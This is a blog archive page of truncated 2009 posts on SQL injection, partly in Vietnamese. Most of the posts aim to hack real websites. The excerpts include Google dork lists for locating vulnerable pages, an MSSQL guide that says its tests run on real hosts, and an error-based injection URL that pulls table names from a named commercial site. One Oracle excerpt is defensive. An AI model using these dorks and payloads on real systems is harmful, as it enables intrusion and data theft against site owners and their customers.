RSS

sql injection

SQL Injection Dorks

Trong quá trình hack bằng SQL Injection, dù là MYSQL hay MSSQL thì ít nhất chúng ta ít nhiều cũng phải nhờ đến google để tìm các trang bị  lỗi, vậy với những từ khóa nào để hỗ trợ cho chúng ta tìm kiếm đây ? Hiểu được vấn đề đó, mình đã tổng hợp lại rất nhiều từ khóa để mọi người dễ dàng tìm hơn, sưu tầm cũng có, và tự mình suy nghĩ cũng có !

inurl:index.php?id=

inurl:trainers.php?id=

(more…)

VN:F [1.9.3_1094]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.3_1094]
Rating: 0 (from 0 votes)
29 May 2009 | Tips & Tricks | , , | 0 Comments   

SQL Injection and Oracle, Part One

SQL injection techniques are an increasingly dangerous threat to the security of information stored upon Oracle Databases. These techniques are being discussed with greater regularity on security mailing lists, forums, and at conferences. There have been many good papers written about SQL Injection and a few about the security of Oracle databases and software but not many that focus on SQL injection and Oracle software. This is the first article in a two-part series that will examine SQL injection attacks against Oracle databases. The objective of this series is to introduce Oracle users to some of the dangers of SQL injection and to suggest some simple ways of protecting against these types of attack. (more…)

VN:F [1.9.3_1094]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.3_1094]
Rating: 0 (from 0 votes)
18 May 2009 | Tutorial Hackin9 | , , | 0 Comments   

SQL Access !

I did’nt find any good MSSQL injection guide, so idecided to write what i know so far about MSSQLi, … tests will be

the tests on real hosts … so lets start!
Step 1:

——

Good dork: site:.org inurl:.asp?id=

site:.com inrul:.aspx?=

site:.co.uk inurl:.asp?cid=

Or you can figure out your own dork.

Step 2: (more…)

VN:F [1.9.3_1094]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.3_1094]
Rating: 0 (from 0 votes)
21 March 2009 | Tutorial Hackin9 | , | 0 Comments   

Blind MySQL injection and database stressing

Complete with the rest of Mysql blind injection papers in the web.

Currently tools are being used to get SQL data from a blind (Microsoft) sql injection, like datathief of absinthe. The problem in Mysql is the dificulty to get the database structure. In Mysql there are no Objects database or alike, so it’s not possible to create an stored procedure to walktrough a database catalog as these programs do with other database managers.

The approach explained here is from a web service viewpoint. It’s, from a web service vulnerable to sql injection.

Current Blind SQL injection methods (more…)

VN:F [1.9.3_1094]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.3_1094]
Rating: 0 (from 0 votes)
20 March 2009 | Home | , , , , | 2 Comments   

Khai thác SQL CFM !

select top 1 table_name from information_schema.tables order by table_name

Example:

http://russianbluediamonds.com/ProductList.cfm?CatDisplay=371%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables %20order%20by%20table_name))–sp_password

Get second table: (more…)

VN:F [1.9.3_1094]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.3_1094]
Rating: 0 (from 0 votes)
18 March 2009 | Tutorial Hackin9 | , , | 1 Comment